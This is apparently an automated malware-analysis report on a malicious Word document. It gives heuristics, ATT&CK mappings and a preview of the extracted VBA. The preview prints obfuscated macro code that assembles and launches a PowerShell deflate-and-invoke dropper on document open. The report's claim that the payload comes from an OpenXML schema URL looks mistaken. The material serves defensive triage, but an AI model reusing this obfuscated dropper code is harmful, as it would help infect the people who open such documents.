MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' and the 'Document_Open' macro indicate that the VBA code is designed to execute arbitrary commands. The script attempts to construct and execute a PowerShell command, which is likely intended to download and execute a second-stage payload from the URL 'http://schemas.openxmlformats.org/drawingml/2006/main'. This indicates a dropper or downloader functionality.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6606412-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6606412-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15189 bytes |
SHA-256: 8734c7c1f4a2430a761d101b8b4d69f8328037078c8fbffa3d12382bdd3a2322 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zYpBmLZSiz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
fAaXV = 74472 - 27603 - 43447 * bqzSdN + mRjcGw - zlfszq / 58553 / opwYw
IISln = 73140 - 23247 - 90552 * UqXzc + EzYus - fCUGq / 795 / CJiMLK
XiRfj = 59489 - 232 - 6103 * ZwlZt + LDhWdl - tQfJPB / 15773 / EPuPt
QbFniJ = 21345 - 72464 - 47056 * TLQRH + QjnDqC - miPza / 89920 / JdwAL
rKAWAd = 30090 - 43685 - 62826 * YZPbE + nibNma - MTJavj / 96734 / YzUNuS
nuDIYC = 56982 - 31326 - 75186 * HrawN + nnNHSF - KkqKH / 80708 / PFVMd
cIQDwYM ("" + SzziRTBEESN + rcUlhlAzWPwus + twiIoSAmtbW + SjkUX + SAqWvsriURwwIN + OhbtXhrVaYH)
PskOT = 46556 - 1852 - 51687 * KwKiR + vjPWQ - VjEvz / 74261 / dpPtrp
NSbvs = 40093 - 25486 - 32115 * JaSBWs + rGBHq - vKqXkI / 39926 / XlpMGz
WciXJ = 29951 - 2239 - 50057 * KNFjt + qcDztI - STlMzj / 90696 / SsZwZ
End Sub
Attribute VB_Name = "wGpUJulljIjJ"
Function twiIoSAmtbW()
On Error Resume Next
IsBXqD = slBBcv + CIdCt * THbXTf - PEwcnD / oHSjmF * KNWLXj + 14533 - SOiOnI / 2310 + dDKVN + (77018 - ZNZFZu - zQouIu / MwwaZ)
BJoBL = rFqlpF + dwXOi * FrGIS - kiRvbz / vZVNb * acYKRE + 28456 - SzBGHq / 92988 + MvAWEa + (18866 - JPlVJA - iwaHp / hoDDGS)
tYQhnq = dcjaWY + zwbhvc * SasAH - RGLuo / HjoIX * DBToEU + 73383 - IPzWs / 55989 + PazXh + (62606 - XWQplU - QIpEw / bwiWYN)
MQFCZ = "pow" + TJXPMaNEjzSwA + tjRpSKhiH + "e" + GwSwIYJUvcz + hVrqHWijmlKZA + "rsh" + imaQRjTQmlrtof + vmdHwSrakPzUL + "e" + HcLqJChdHO + EQcuAfv + "ll " + XnBMuzjBhzEd + QdpznNJWtrNm + "&" + VwoQsmjp + OCBbZOAbsfL + "( " + iHBdBtKw + YjiKnkaAbSMil + "$" + wiqlufvEoGJr + vAiGNdvqEMqR + "E" + wwzWpvEOTNNJ + uDitRRjShcX + "n" + FadudALGpHnC + jjRtDATwAiz + "V" + EfRWwGIz + SkIRVEwrrEnzm + ":C" + UiTJZvzdoGaY + vFfrpwIuizrEq + "OMS" + YEtBndXoqOvUHU + jLCvzIHwQaZAWR + "Pe" + shPCjWz + QpdudBaXCL + "c" + JwQwwlNEXSYtr + FIOJOqXiTi + "["
YzcTFc = ilzFj + kHBzQk * AbVPn - iwmNz / uwoEv * TQcuoF + 5439 - YijVlC / 89377 + lwiMfD + (96165 - vXCnp - vDGwwT / GnPMJd)
mTbbQAmWV = "4" + cuXvMrZiS + KzQDPplij + "," + GbYfJPzWZzCi + PtaEdXfj + "15," + HWLzUsSiB + wXjhKiwqVIVVv + "2" + KiCrGZaIYnDCCj + cGUSVtWTo + "5]-" + fHmAQwYiojJiO + IuGjtKpos + "J" + haQHjDXkuAm + FiwrnSXGwGlcM + "O" + fpStlpPzRjzGL + PVHSaPMwBZr + "I" + TffWuhEEhsBw + jKpMLbUrPUu + "n''"
SrQUtU = ilAaMi + WhdGU * ifnMNj - RcQLbN / mNQYH * MCvKOA + 64956 - zJmNa / 93920 + nDEHNa + (24567 - VpzwW - IQEzpY / kdzNwq)
dzBQP = KLRtDz + ZVPBK * oshOk - KCZHt / ktisr * iGowEn + 10261 - YfLIhL / 75602 + iaviRr + (9906 - kEXiTG - jdSSD / qnuJzz)
buLIFK = ")( " + ahcIOIwJf + sNAPbTS + "N" + iOtjAnmAYUr + TdpCKrK + "E" + nbCidnfiih + mMosIaWwk + "w-O" + botXZZJaCtKbRh + zVqpKHqj + "bj" + JBQoojb + ujPFJVGPTbk + "E" + rQWauVoU + FYPHJOFbz + "c" + WajPjUDs + jizKARN + "t"
wJwsm = 86268 + 197 + ZDYjn / 13824 + qIEvv - pKdCbF
oGzWK = 62912 + 87428 + wBOAl / 65960 + UpnKN - kcaIY
lFcsz = " IO" + OllbQnEWNs + vlObZtd + "." + DdwZHwTpK + WCpnzMqTmmrDNp + "cOM" + OaBMasFLIn + okjCFmjt + "p" + iNCJwiMalkM + OIaViwi + "R" + KjfBGozb + cnvoJRu + "ES" + iBRzOjRtfRCwRv + ViwYXcJ + "s" + zQTUQDjV + IsjQVouSKFFKra + "io" + nzCbFrpmRPwZO + amwMKmNbk + "N." + zWFmYsic + TDrQCzwFpVDw + "deF" + XtNbBZVSzvs + iqGqmzjHiGwH + "LAT" + WuHHDkbPf + aqRAEwYj + "esT" + OjiQwFWpmR + KzXsnoiF + "R"
ckLGP = 13000 + 57438 + XXYuH / 22279 + qEiEZs - mNjRd
arlaUw = "EAM" + AKEDHuFrqQLd + oPsMPzkEBpSPzz + "( " + dRAoWOqDEikMoo + TpZQZRzLz + "[Io" + PlrwHRsm + FaaZoHjNXPN + ".M" + wIYKYMT + ZFaRMlcvwBUnN + "e" + rkJQzbjvnjvojH + amQAVwXuvkc + "mOR" + HOitYSnC + MsJnhRwtobbtA + "ySt" + isNPUNzNk + MvKojXXuEH + "Rea" + pdwqnrkN + fuZaniiNfZGM + "M]" + iAuDWGs + hXlWWLVzS + " [c" + PQOGkoQqcmE + wInwjrHtYc + "o" + BMHBJZn + mRloThpBifc + "Nv"
PJomtc = 70027 + 11620 + EzviQ / 70624 + EfLMSM - TPXWQ
ZOYZT = 52410 + 186 + rnVDic /
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.